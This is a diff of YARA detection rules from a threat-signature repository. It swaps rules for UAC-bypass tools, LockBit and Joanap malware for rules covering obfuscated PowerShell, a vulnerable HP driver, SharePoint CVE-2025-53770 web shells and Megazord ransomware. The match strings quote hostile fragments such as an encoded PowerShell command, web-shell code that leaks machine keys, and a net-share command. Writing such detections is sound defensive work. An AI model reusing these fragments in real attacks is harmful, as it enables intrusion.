+rule SIGNATURE_BASE_SUSP_Obfuscted_Powershell_Code
 {
 	meta:
-		description = "UACElevator bypassing UAC - file UACElevator.exe"
+		description = "Detects obfuscated PowerShell Code"
 		author = "Florian Roth (Nextron Systems)"
-		id = "629b1a92-726d-5713-ae3d-74cc8a1e52ad"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/MalwareTech/UACElevator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L66-L90"
+		id = "e2d8fc9e-ce2b-5118-8305-0d5839561d4f"
+		date = "2018-12-13"
+		modified = "2025-02-12"
+		reference = "https://twitter.com/silv0123/status/1073072691584880640"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L28-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
-		logic_hash = "8215746b2c84a5500221580969fb2eac8ee11cbb5af4ba5bf2dbd1def65b8745"
-		score = 75
+		logic_hash = "afd7e4b88c812b23441549565a18fde18c24fe91ec467455002ef338e092ebf9"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "\\UACElevator.pdb" ascii
-		$s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
-		$s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
-		$s3 = "Infection module: %s" fullword ascii
-		$s4 = "Could not save module to %s" fullword ascii
-		$s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
-		$s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
-		$s7 = "Stack around the variable '" fullword ascii
-		$s8 = "MSVCR120D.dll" fullword wide
-		$s9 = "Address: 0x" fullword ascii
+		$s1 = "').Invoke(" ascii
+		$s2 = "(\"{1}{0}\"" ascii
+		$s3 = "{0}\" -f" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ( $s* ) )
+		#s1> 11 and #s2 > 10 and #s3 > 10
 }
-rule SIGNATURE_BASE_S4U : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_Caret_Obfuscation_2
 {
 	meta:
-		description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
+		description = "Detects powershell keyword obfuscated with carets"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d746311-56fe-538c-946c-3a3dd1603adc"
-		date = "2015-06-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/aurel26/s-4-u-for-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L92-L139"
+		id = "976e261a-029c-5703-835f-a235c5657471"
+		date = "2019-07-20"
+		modified = "2025-02-12"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L43-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
-		logic_hash = "b1882710f2514fb44ff01631636c0a66beef620c8bea644ebe05cd5385a9e494"
-		score = 50
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "0aa21df64d61cb299b0f77da8b97e8cfc379622a8092e71657c478519d83fd31"
+		score = 65
+		quality = 31
+		tags = ""
 
 	strings:
-		$x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii
-		$x1 = "\\Release\\s4u.pdb" ascii
-		$s0 = "CreateProcessAsUser failed (error %u)." fullword ascii
-		$s1 = "GetTokenInformation failed (error: %u)." fullword ascii
-		$s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii
-		$s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii
-		$s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii
-		$s5 = "The token does not have the specified privilege (%S)." fullword ascii
-		$s6 = "Unable to parse command line." fullword ascii
-		$s7 = "Unable to find logon SID." fullword ascii
-		$s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
-		$s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii
-		$g1 = "%systemroot%\\system32\\cmd.exe" wide
-		$g2 = "SeTcbPrivilege" wide
-		$g3 = "winsta0\\default" wide
-		$g4 = ".rsrc"
-		$g5 = "HeapAlloc"
-		$g6 = "GetCurrentProcess"
-		$g7 = "HeapFree"
-		$g8 = "GetProcessHeap"
-		$g9 = "ExpandEnvironmentStrings"
-		$g10 = "ConvertStringSidToSid"
-		$g11 = "LookupPrivilegeValue"
-		$g12 = "AllocateLocallyUniqueId"
-		$g13 = "ADVAPI32.dll"
-		$g14 = "LsaLookupAuthenticationPackage"
-		$g15 = "Secur32.dll"
-		$g16 = "MSVCR120.dll"
+		$r1 = /p[\^]?o[\^]?w[\^]?e[\^]?r[\^]?s[\^]?h[\^]?e[\^]?l\^l/ ascii wide nocase fullword
+		$r2 = /p\^o[\^]?w[\^]?e[\^]?r[\^]?s[\^]?h[\^]?e[\^]?l[\^]?l/ ascii wide nocase fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $g* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_UACME_Akagi_2 : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_Powershell_True_Jun20_1 : FILE
 {
 	meta:
-		description = "Detects Windows User Account Control Bypass - from files Akagi32.exe, Akagi64.exe"
+		description = "Detects indicators often found in obfuscated PowerShell scripts. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
 		author = "Florian Roth (Nextron Systems)"
-		id = "1177d663-1081-5d17-9dd7-1218d95d90f7"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/hfiref0x/UACME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_uac_elevators.yar#L151-L174"
+		id = "e9bb870b-ad72-57d3-beff-2f84a81490eb"
+		date = "2020-06-27"
+		modified = "2025-02-12"
+		reference = "https://github.com/corneacristian/mimikatz-bypass/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L57-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f79a82d466f51c86a0e6fb89688708c35dbcc7ba8f4543e5fb7565d41dd3faab"
-		score = 80
+		logic_hash = "8f33762e6e93fcf6b423b34eb1abefae2ae91b51048303947f7c1601823630d7"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca"
-		hash2 = "609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5"
 
 	strings:
-		$x1 = "Usage: Akagi.exe [Method] [OptionalParamToExecute]" fullword wide
-		$x2 = "[UCM] Target file already exists, abort" fullword wide
-		$s1 = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword wide
-		$s2 = "Akagi.exe" fullword wide
-		$s3 = "Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" fullword wide
-		$s4 = "/c wusa %ws /extract:%%windir%%\\system32\\sysprep" fullword wide
-		$s5 = "/c wusa %ws /extract:%%windir%%\\system32\\migwiz" fullword wide
-		$s6 = "loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"" fullword ascii
+		$ = "${t`rue}" ascii nocase
+		$ = "${tr`ue}" ascii nocase
+		$ = "${tru`e}" ascii nocase
+		$ = "${t`ru`e}" ascii nocase
+		$ = "${tr`u`e}" ascii nocase
+		$ = "${t`r`ue}" ascii nocase
+		$ = "${t`r`u`e}" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_ACE_Containing_EXE
+rule SIGNATURE_BASE_SUSP_Vulndriver_HP_Hardware_Diagnostics_Etdsupp_May23 : FILE
 {
 	meta:
-		description = "Looks for ACE Archives containing an exe/scr file"
-		author = "Florian Roth (Nextron Systems) - based on Nick Hoffman' rule - Morphick Inc"
-		id = "0756f0e7-39f1-572d-a77d-1f7826332360"
-		date = "2015-09-09"
+		description = "Detects vulnerable versions of the HP Hardware Diagnostics driver (etdsupp.sys) based on PE metadata info"
+		author = "X__Junior (Nextron Systems)"
+		id = "8f838e4f-3e3e-5131-9d67-e49f6848bb37"
+		date = "2023-05-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ace_with_exe.yar#L2-L20"
+		reference = "https://github.com/alfarom256/HPHardwareDiagnostics-PoC/tree/main/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_vulndriver_hp_hardware_diagnostics_etdsupp_may23.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27fba0db7a98fbaf4b3710a9e411ed74860099c133a2e83ddf368ae2fef3c288"
-		score = 50
-		quality = 83
-		tags = ""
+		hash = "f744abb99c97d98e4cd08072a897107829d6d8481aee96c22443f626d00f4145"
+		logic_hash = "bb50f591e49b1b0b08ccbe4ca5cb3685d8f358e51e6d6f77677bc05701f6b301"
+		score = 65
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$header = { 2a 2a 41 43 45 2a 2a }
-		$extensions1 = ".exe"
-		$extensions2 = ".EXE"
-		$extensions3 = ".scr"
-		$extensions4 = ".SCR"
+		$s1 = {4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 65 00 74 00 64 00 73 00 75 00 70 00 70 00 2e 00 73 00 79 00 73 00}
+		$s2 = "etdsupp.pdb"
+		$s3 = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}([\x00-\xff]{2}[\x00-\x11]\x00[\x00-\xff]{4}|\x00\x00\x12\x00\x00\x00\x00\x00)/
 
 	condition:
-		$header at 7 and for any of ( $extensions* ) : ( $ in ( 81 .. ( 81 + uint16( 79 ) ) ) )
+		uint16( 0 ) == 0x5a4d and int16 ( uint32( 0x3C ) + 0x5c ) == 0x0001 and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Packed_Feb24 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Sharepoint_Drop_CVE_2025_53770_Jul25 : CVE_2025_53770 FILE
 {
 	meta:
-		description = "Detect the packer used by Lockbit4.0"
-		author = "0x0d4y"
-		id = "3c2b2806-9dce-4dce-a7ca-89ebc9005695"
-		date = "2024-02-16"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_packed_win_feb24.yar#L1-L25"
+		description = "Detects ASPX web shell dropped during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
+		author = "Florian Roth"
+		id = "136ab1a3-647b-5196-9e08-12c3b913bd55"
+		date = "2025-07-20"
+		modified = "2025-07-25"
+		reference = "https://research.eye.security/sharepoint-under-siege/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "15796971d60f9d71ad162060f0f76a02"
-		logic_hash = "07281fd86efbb7167ba1cc0c6f6897418751df1a3697869e51f806c26641e365"
-		score = 100
+		hash = "27c45b8ed7b8a7e5fff473b50c24028bd028a9fe8e25e5cea2bf5e676e531014"
+		hash = "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514"
+		hash = "b336f936be13b3d01a8544ea3906193608022b40c28dd8f1f281e361c9b64e93"
+		logic_hash = "3c7bb848fc73418d5a3ecae6e9f637a7d07bf45a75b1bd0a278fdbfae428d619"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
+		tags = "CVE-2025-53770, FILE"
 
 	strings:
-		$unpacking_loop_64b = { 8b 1e 48 83 ee fc 11 db 8a 16 72 e5 8d 41 01 41 ff d3 11 c0 01 db 75 0a }
-		$jump_to_unpacked_code_64b = { 48 8b 2d 16 0f ?? ?? 48 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 49 89 e1 41 b8 04 ?? ?? ?? 53 5a 90 57 59 90 48 83 ec ?? ff d5 48 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 4c 8d 4c 24 ?? 4d 8b 01 53 90 5a 90 57 59 ff d5 48 83 c4 ?? 5d 5f 5e 5b 48 8d 44 24 ?? 6a ?? 48 39 c4 75 f9 48 83 ec ?? e9 }
-		$unpacking_loop_32b = { 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 9C 29 C0 40 9D 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 73 }
-		$jump_to_unpacked_code_32b = { 8b ae ?? ?? ?? ?? 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 54 6a 04 53 57 ff d5 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ?? ?? 8d bb ?? ?? ?? ?? 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 ?? 6a ?? 39 c4 75 fa 83 ec ?? e9 }
+		$x1 = "var sy = System.Reflection.Assembly.Load(" ascii
+		$x2 = "Response.Write(cg.ValidationKey+" ascii
+		$s1 = "<script runat=\"server\" language=\"c#\" CODEPAGE=\"65001\">" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $jump_to_unpacked_code_* ) and 1 of ( $unpacking_loop_* )
+		filesize < 4KB and 1 of ( $x* ) or all of them
 }
-
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Compiled_Sharepoint_Drop_CVE_2025_53770_Jul25_2 : CVE_2025_53770 FILE
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a3a4f9a6-367d-5d99-bffb-f4ff03fa4a09"
-		date = "2018-05-30"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L13-L34"
+		description = "Detects compiled ASPX web shell dropped during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
+		author = "Florian Roth, Marius Benthin"
+		id = "2feef057-7100-59d5-83f1-cee3bd5bd791"
+		date = "2025-07-20"
+		modified = "2025-07-25"
+		reference = "https://research.eye.security/sharepoint-under-siege/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L22-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "746c74713ac52f62d5a5c41d2c9321e00481a45aa2c23f1695fab0f5b6d5dfb4"
+		hash = "8d3d3f3a17d233bc8562765e61f7314ca7a08130ac0fb153ffd091612920b0f2"
+		hash = "d8ca5e5d6400ac34ac4cc138efa89d2ec4d5c0e968a78fa3ba5dbc04c7550649"
+		hash = "7e9b77da1f51d03ee2f96bc976f6aeb781f801cf633862a4b8c356cbb555927d"
+		logic_hash = "df11e5bd293cf094f3a147b54ecaafbe0804d7d575fcc22f38e77ab155c7ebdc"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea46ed5aed900cd9f01156a1cd446cbb3e10191f9f980e9f710ea1c20440c781"
+		quality = 58
+		tags = "CVE-2025-53770, FILE"
 
 	strings:
-		$x1 = "cmd.exe /q /c net share adnim$" ascii
-		$x2 = "\\\\%s\\adnim$\\system32\\%s" fullword ascii
-		$s1 = "SMB_Dll.dll" fullword ascii
-		$s2 = "%s User or Password is not correct!" fullword ascii
-		$s3 = "perfw06.dat" fullword ascii
+		$x1 = /App_Web_spinstall\d{0,1}.aspx/ wide
+		$x2 = /spinstall[\w]?[\._]aspx/ ascii
+		$x3 = /\/_layouts\/1[0-9]\/spinstall/ wide
+		$x4 = /\/_layouts\/1[0-9]\/ghostfile/ wide
+		$s1 = "System.Web.Configuration.MachineKeySection" wide
+		$s2 = "Page_load" ascii fullword
+		$s3 = "GetApplicationConfig" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "f0087d7b90876a2769f2229c6789fcf3" or 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) or 2 of ( $x* ) or 4 of them
 }
-
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample2 : FILE
+rule SIGNATURE_BASE_APT_EXPL_Sharepoint_CVE_2025_53770_Forensicartefact_Jul25_1 : CVE_2025_53770
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f4e6e6c-ee2b-5fa3-bf85-5a1652b38c52"
-		date = "2018-05-30"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L36-L55"
+		description = "Detects URIs accessed during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
+		author = "Florian Roth"
+		id = "845e08bc-a02f-5ca0-8acb-39c58d38d523"
+		date = "2025-07-20"
+		modified = "2025-07-23"
+		reference = "https://research.eye.security/sharepoint-under-siege/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L53-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "046135e4a1161841835cd9d10e13224b440e914ce3f409bad84a1df2638a7d5f"
+		logic_hash = "cca885bad087d1ed12f00ccad558bb474027f7cce058be76360df31c9499e771"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "077d9e0e12357d27f7f0c336239e961a7049971446f7a3f10268d9439ef67885"
+		quality = 81
+		tags = "CVE-2025-53770"
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\svchost.exe -k Wmmvsvc" fullword ascii
-		$s2 = "%SystemRoot%\\system32\\svchost.exe -k SCardPrv" fullword ascii
-		$s3 = "%SystemRoot%\\system32\\Wmmvsvc.dll" fullword ascii
-		$s4 = "%SystemRoot%\\system32\\scardprv.dll" fullword ascii
+		$sa1 = /POST \/_layouts\/1[0-9]\/ToolPane\.aspx/ ascii wide nocase
+		$sa2 = "DisplayMode=Edit&a=/ToolPane.aspx" ascii wide
+		$sb1 = /GET \/_layouts\/1[0-9]\/spinstall/ ascii wide
+		$sb2 = "/_layouts/SignOut.aspx 200" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "e8cd12071a8e823ebc434c8ee3e23203" or 2 of them )
+		(@sa2 - @sa1 ) < 700 or ( @sb2 - @sb1 ) < 700 or ( @sb2 - @sa1 ) < 700
 }
-
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample3 : FILE
+rule SIGNATURE_BASE_APT_EXPL_Sharepoint_CVE_2025_53770_Forensicartefact_Jul25_2 : CVE_2025_53770
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c2551bc-01dd-5b30-a4cc-703a868cde73"
-		date = "2018-05-30"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA18-149A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_149A.yar#L57-L78"
+		description = "Detects URIs accessed during the exploitation of SharePoint RCE vulnerability CVE-2025-53770"
+		author = "Florian Roth"
+		id = "57c2caf8-6458-51d5-80c5-8ceee2f55072"
+		date = "2025-07-20"
+		modified = "2025-07-24"
+		reference = "https://research.eye.security/sharepoint-under-siege/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_jul25.yar#L73-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a3da6c70d2ab94820324a55f1bcdcf5507a8ddf26efc80904daf0d9b27ac9312"
-		score = 75
+		hash = "30955794792a7ce045660bb1e1917eef36f1d5865891b8110bf982382b305b27"
+		hash = "b336f936be13b3d01a8544ea3906193608022b40c28dd8f1f281e361c9b64e93"
+		logic_hash = "5ae0620e7e1c1908ad54ac4e41c53240f738631c20577fd65fb29008945347a8"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1c483b0ee740291b91b11e18dd05f0a460127acfc19d47b446d11cd0e26d717"
+		tags = "CVE-2025-53770"
 
 	strings:
-		$s1 = "mssvcdll.dll" fullword ascii
-		$s2 = "https://www.google.com/index.html" fullword ascii
-		$s3 = "LOGINDLG" fullword wide
-		$s4 = "rundll" fullword ascii
-		$s5 = "%%s\\%%s%%0%dd.%%s" fullword ascii
-		$s6 = "%%s\\%%s%%0%dd" fullword ascii
+		$x1 = "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" ascii wide
+		$x2 = "TEMPLATE\\LAYOUTS\\spinstall" ascii wide
+		$x3 = "TEMPLATE\\LAYOUTS\\ghostfile" ascii wide
+		$x4 = "TEMPLATE\\LAYOUTS\\1.css" ascii wide
+		$x5 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx" ascii wide
+		$xe1 = "TQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUwBcA"
+		$xe2 = "0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMAXA"
+		$xe3 = "NAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTAFwA"
+		$xe4 = "TQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUwBcA"
+		$xe5 = "0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMAXA"
+		$xe6 = "NAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTAFwA"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6f7b2e00921129d18061822197111cd" or 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Nim_Nimpackt : EXE FILE HKTL
+rule SIGNATURE_BASE_MAL_WIN_Megazord_Apr25 : FILE
 {
 	meta:
-		description = "Detects binaries generated with NimPackt v1"
-		author = "Cas van Cooten"
-		id = "3399d937-133f-5701-840e-eaf68b2f1ec9"
-		date = "2022-01-26"
-		modified = "2023-12-05"
-		reference = "https://github.com/chvancooten/NimPackt-v1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nimpackt.yar#L2-L23"
+		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team, detects the main components of the Megazord Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "6225a690-8f54-4a50-a19a-8f7523537228"
+		date = "2025-04-11"
+		modified = "2025-04-16"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_megazord_apr25.yar#L1-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2bda7acb440d1c72efeaddcb18b736343d658d59feccf6c9339b313cd35f32eb"
+		hash = "fd380db23531bb7bb610a7b32fc2a6d5"
+		logic_hash = "1a73e67b9a43c4f1bbe9f3dbebeb428bbfa705f7c858909a7bbf0673951d677e"
 		score = 80
-		quality = 79
-		tags = "EXE, FILE, HKTL"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.akira"
 
 	strings:
-		$nim1 = "fatal.nim" ascii fullword
-		$nim2 = "winim" ascii
-		$np1 = { 4E 69 6D 50 61 63 6B 74 }
-		$sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 }
-		$sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 }
-		$sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A }
+		$code_custom_algorithm = { 89 c1 45 31 e6 31 e8 44 31 f0 35 ?? ?? ?? ?? c1 c0 0b 44 31 ff 44 31 ef 31 c7 81 f7 ?? ?? ?? ?? c1 c7 0b 44 31 e3 31 cb 31 fb 81 f3 ?? ?? ?? ?? c1 c3 0b 89 da 31 c2 89 84 24 ?? ?? ?? ?? 44 31 ed 31 d5 89 94 24 ?? ?? ?? ?? 81 f5 ?? ?? ?? ?? c1 c5 0b 41 89 e8 41 31 f8 89 bc 24 ?? ?? ?? ?? 41 31 cf 45 31 c7 44 89 84 24 ?? ?? ?? ?? 41 81 f7 ?? ?? ?? ?? 41 c1 c7 0b 41 31 d4 45 31 fc 41 81 f4 ?? ?? ?? ?? 41 c1 c4 0b 45 31 c5 45 31 e5 41 81 f5 ?? ?? ?? ?? 41 c1 c5 0b 89 9c 24 ?? ?? ?? ?? 31 d9 44 31 f9 44 31 e9 81 f1 ?? ?? ?? ?? c1 c1 0b 41 89 c8 45 31 e0 44 89 a4 24 ?? ?? ?? ?? 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c0 35 ?? ?? ?? ?? c1 c0 0b 44 89 fa 44 89 bc 24 ?? ?? ?? ?? 31 fa 44 31 ea 31 c2 41 89 c1 81 f2 ?? ?? ?? ?? c1 c2 0b 41 31 d8 41 31 d0 41 81 f0 ?? ?? ?? ?? 41 c1 c0 0b 44 89 e8 44 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c8 44 31 c0 45 89 c3 35 }
+		$megazord_str_I = "powerranges" ascii
+		$megazord_str_II = "onion" ascii
+		$megazord_str_III = "powershell" ascii
+		$megazord_str_IV = "taskkill" ascii
+		$megazord_str_V = "mal_public_key_bytes" ascii
+		$megazord_str_VI = "runneradmin" ascii
+		$megazord_str_VII = "//rustc" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 750KB and 1 of ( $nim* ) and ( $np1 or 2 of ( $sus* ) )
+		uint16( 0 ) == 0x5a4d and $code_custom_algorithm and 5 of ( $megazord_str_* )
 }
